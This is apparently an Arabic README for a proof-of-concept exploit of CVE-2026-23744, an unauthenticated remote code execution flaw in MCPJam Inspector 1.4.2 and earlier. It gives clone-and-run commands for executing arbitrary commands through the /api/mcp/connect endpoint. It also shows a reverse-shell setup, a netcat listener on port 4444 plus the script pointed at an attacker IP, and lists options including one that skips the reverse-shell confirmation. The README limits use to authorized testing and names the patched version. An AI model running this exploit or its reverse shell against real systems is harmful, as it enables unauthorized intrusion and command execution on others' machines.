
إثبات مفهوم لتنفيذ تعليمات برمجية عن بُعد دون مصادقة لثغرة CVE-2026-23744 التي تستهدف MCPJam Inspector. يولّد حمولات serverConfig خاصة بـ MCP لاستغلال نقطة النهاية /api/mcp/connect مع دعم الصدفة العكسية وتصحيح الأخطاء عبر التشغيل التجريبي.
إثبات مفهوم (PoC) لتنفيذ التعليمات البرمجية عن بُعد بدون مصادقة لثغرة CVE-2026-23744. تعرّض MCPJam Inspector الإصدار 1.4.2 والإصدارات الأقدم وظائف عبر /api/mcp/connect يمكنها تشغيل أمر خادم MCP يتحكم فيه المهاجم دون مصادقة.
للاستخدام في الاختبارات والأبحاث المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
serverConfig مصممة بعناية لـ MCP./api/mcp/connect غير المحمية بمصادقة.bash -c.


git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
ابدأ بمستمع أولاً:
rlwrap nc -lvnp 4444
ثم شغّل:
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
خيارات مفيدة:
--cmd COMMAND Command to execute (default: id)
--server-id VALUE serverId value in the crafted MCP config (default: pwn)
--dry-run Build payload flow without sending the HTTP request
--debug Print endpoint and JSON payload
--verify-tls Verify HTTPS certificates
--timeout SECONDS HTTP timeout in seconds (default: 8)
--yes Skip reverse-shell confirmation prompt
| المنتج | الإصدار المتأثر | الوصول المطلوب | التأثير |
|---|---|---|---|
| MCPJam Inspector | <= 1.4.2 | لا شيء | تنفيذ أوامر عن بُعد بصلاحيات مستخدم عملية MCPJam Inspector |
تكون الثغرة بارزة بشكل خاص عندما يستمع MCPJam Inspector على 0.0.0.0، مما يسمح للمضيفين البعيدين بالوصول إلى خدمة التطوير.
/api/mcp/connect.serverConfig.command و serverConfig.args.--cmd للتحقق الآمن قبل محاولة القشرة العكسية.--dry-run --debug لفحص الطلب المُنشأ دون لمس الهدف.1.4.3 يحتوي على التصحيح الرسمي وفقًا لـ NVD.ozcanpng — github.com/ozcanpng — ozcanpng.dev